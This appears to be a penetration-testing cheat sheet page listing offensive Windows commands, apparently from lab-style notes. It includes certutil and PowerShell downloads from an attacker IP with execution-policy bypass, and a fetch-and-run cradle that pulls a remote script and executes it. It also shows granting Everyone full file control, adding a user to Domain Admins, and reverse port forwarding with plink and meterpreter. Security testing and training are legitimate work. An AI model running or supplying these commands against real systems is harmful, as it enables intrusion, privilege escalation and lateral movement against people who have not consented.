99 Basic Command

// File Download
certutil.exe -urlcache -split -f http://ip/file file 
Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"

// Powershell download
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'" 

// Powershell remote execution
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"

icacls text.txt /grant Everyone:F

Add-DomainGroupMember -Identity 'Domain Admins' -Members fkclai -Verbose

certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64

# Port forward using plink
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56

Previous06 Kerberos Attack Next01 Reconnaissance

Last updated 2 years ago